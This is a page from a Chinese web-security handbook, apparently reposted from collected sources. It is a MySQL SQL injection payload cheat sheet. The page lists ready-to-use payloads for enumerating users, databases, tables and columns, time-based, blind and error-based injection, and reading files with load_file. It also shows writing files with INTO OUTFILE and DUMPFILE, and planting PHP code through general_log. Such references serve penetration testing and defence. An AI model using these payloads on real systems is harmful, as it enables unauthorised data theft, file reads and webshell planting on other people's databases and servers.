- 目录
- 1. 序章
- 2. 计算机网络与协议
- 3. 信息收集
- 4. 常见漏洞攻防
- 5. 语言与框架
- 6. 内网渗透
- 7. 云安全
- 8. 防御技术
- 9. 认证机制
- 10. 工具与资源
- 11. 手册速查
- 12. 其他
文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
4.1.7.2. MySQL Payload
4.1.7.2. MySQL Payload
4.1.7.2.1. 常见Payload
- Version
SELECT @@version
- Comment
SELECT 1 -- comment
SELECT 1 # comment
SELECT /*comment*/1
- Space
0x9
0xa-0xd
0x20
0xa0
- Current User
SELECT user()
SELECT system_user()
SELECT current_role()
- List User
SELECT user FROM mysql.user
- Current Database
SELECT database()
- List Database
SELECT schema_name FROM information_schema.schemata
- List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
- List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
- If
SELECT if(1=1,'foo','bar');
return 'foo'
- Ascii
SELECT char(0x41)
SELECT ascii('A')
SELECT 0x414243
=> returnABC
- Delay
sleep(1)
SELECT BENCHMARK(1000000,MD5('A'))
- Read File
select @@datadir
select load_file('databasename/tablename.MYD')
- Blind
ascii(substring(str,pos,length)) & 32 = 1
- Error Based
select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))
- Change Password
mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"
4.1.7.2.1.1. 报错注入常见函数
- extractvalue
- updatexml
- GeometryCollection
- linestring
- multilinestring
- multipoint
- multipolygon
- polygon
- exp
4.1.7.2.2. 写文件
4.1.7.2.2.1. 写文件前提
- root 权限
- 知晓文件绝对路径
- 写入的路径存在写入权限
- secure_file_priv 允许向对应位置写入
select count(file_priv) from mysql.user
4.1.7.2.2.2. 基于 into 写文件
union select 1,1,1 into outfile '/tmp/demo.txt' union select 1,1,1 into dumpfile '/tmp/demo.txt'
dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏
4.1.7.2.2.3. 基于 log 写文件
show variables like '%general%'; set global general_log = on; set global general_log_file = '/path/to/file'; select '<?php var_dump("test");?>'; set global general_log_file = '/original/path'; set global general_log = off;
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论